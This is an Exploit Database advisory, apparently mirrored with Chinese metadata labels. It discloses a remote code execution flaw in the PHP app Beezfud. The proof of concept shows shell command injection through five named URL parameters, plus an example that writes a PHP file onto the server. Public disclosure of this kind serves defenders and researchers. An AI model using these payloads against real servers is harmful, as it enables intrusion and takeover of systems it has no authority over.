Beezfud – Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Ashiyane Digital Security Team
  日期： 2015-12-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39093/

• ================================================================================
  # Beezfud Remote Code Execution
  ================================================================================
  # Vendor Homepage: https://github.com/EVA-01/beezfud
  # Date: 23/12/2015
  # Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
  # Author: Ashiyane Digital Security Team
  # Contact: hehsan979@gmail.com
  # Source: http://ehsansec.ir/advisories/beezfud-exec.txt
  ================================================================================
  # Vulnerable File : index.php
  
  # PoC :
  
  http://localhost/beezfud/index.php?parameter=;Command;
  
  Vulnerable Parameters : lookback , max , range , latest , earliest
  
  
  Example :
  
  http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
  ?>' >info.php;
  
  ================================================================================
  # Discovered By : Ehsan Hosseini (EhsanSec.ir)
  ================================================================================